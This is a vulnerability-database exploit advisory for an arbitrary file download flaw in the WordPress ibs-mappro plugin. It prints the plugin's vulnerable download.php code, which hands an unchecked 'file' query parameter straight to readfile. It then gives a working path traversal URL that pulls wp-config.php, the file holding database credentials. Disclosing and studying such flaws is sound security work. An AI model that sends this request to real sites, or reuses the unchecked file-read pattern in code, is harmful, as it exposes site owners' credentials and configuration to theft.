Wordpress ibs-mappro Plugin Arbitrary File Download Vulnerability

2015.07.16
Credit: Ashiyane Digital Security Team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress ibs-mappro Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/ibs-mappro/ | [+] Download Link : https://downloads.wordpress.org/plugin/ibs-mappro.0.5.zip | [+] Tested on: Windows,Linux | | [+] Date :2015-07-14 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/ibs-mappro/lib/download.php | [+] Vulnerable Code : <?php function getRoot() { $self_path = $_SERVER['PHP_SELF']; $root = $_SERVER['DOCUMENT_ROOT']; if (substr($root, strlen($root) - 1) == '/') $root = substr($root, 0, strlen($root) - 1); while (strpos($self_path, 'index') > 0) { $self_path = preg_replace("-[/\\\\][^/\\\\]+[/\\\\]?$-", '', $self_path); } $root .= $self_path . '/'; return $root; } if (isset($_GET)) { $filename = $_GET['file']; $info = pathinfo($filename); $name = $info['basename']; if (file_exists($filename)) { header('Set-Cookie: fileDownload=true; path=/'); header('Cache-Control: max-age=60, must-revalidate'); header('Content-Disposition: attachment; filename="' . $title . '-' . $timestamp . '.csv"'); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $name . '"'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($filename)); ob_clean(); flush(); readfile($filename); exit; } else { die; } } else { die; } ?> | [+] http://localhost/wordpress/wp-content/plugins/ibs-mappro/lib/download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top